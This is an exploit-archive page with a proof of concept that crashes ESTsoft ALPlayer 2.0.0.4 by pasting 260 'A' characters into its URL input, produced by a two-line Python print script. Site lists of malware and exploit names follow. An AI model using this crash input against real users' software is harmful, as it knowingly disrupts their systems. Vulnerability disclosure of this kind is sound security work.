ESTsoft ALPlayer URL crash PoC

Posted on 30 November -0001

<HTML><HEAD><TITLE>ESTsoft ALPlayer URL crash PoC</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: ESTsoft ALPlayer URL crash PoC
# Date: 26/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://www.estsoft.com/
# Version: 2.0.0.4
# Tested on: Windows 7 32/64bit
# Thanks to Viotto.

====Description====

ESTsoft ALPlayer doesn't properly check URL input text, causing ability to crash the app by supplying fancy long strings.
Not tested for code execution, just a quick write-up.

====Proof-of-Concept====

# 1. Generate 260 A's
# 2. In ALPlayer > File > Open > URL... > Paste those A's
# 3. Enjoy crashing nice app

print "Paste this ultrafancy A's string into URL input"
print 'A' * 260

</BODY></HTML>

TOP

Malware :

Backdoor:Win32/Heloag.A
Exploit:Win32/CVE-2011-3402
Trojan:Win32/Obfac
Exploit:Win32/Pdfjsc.YP
TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20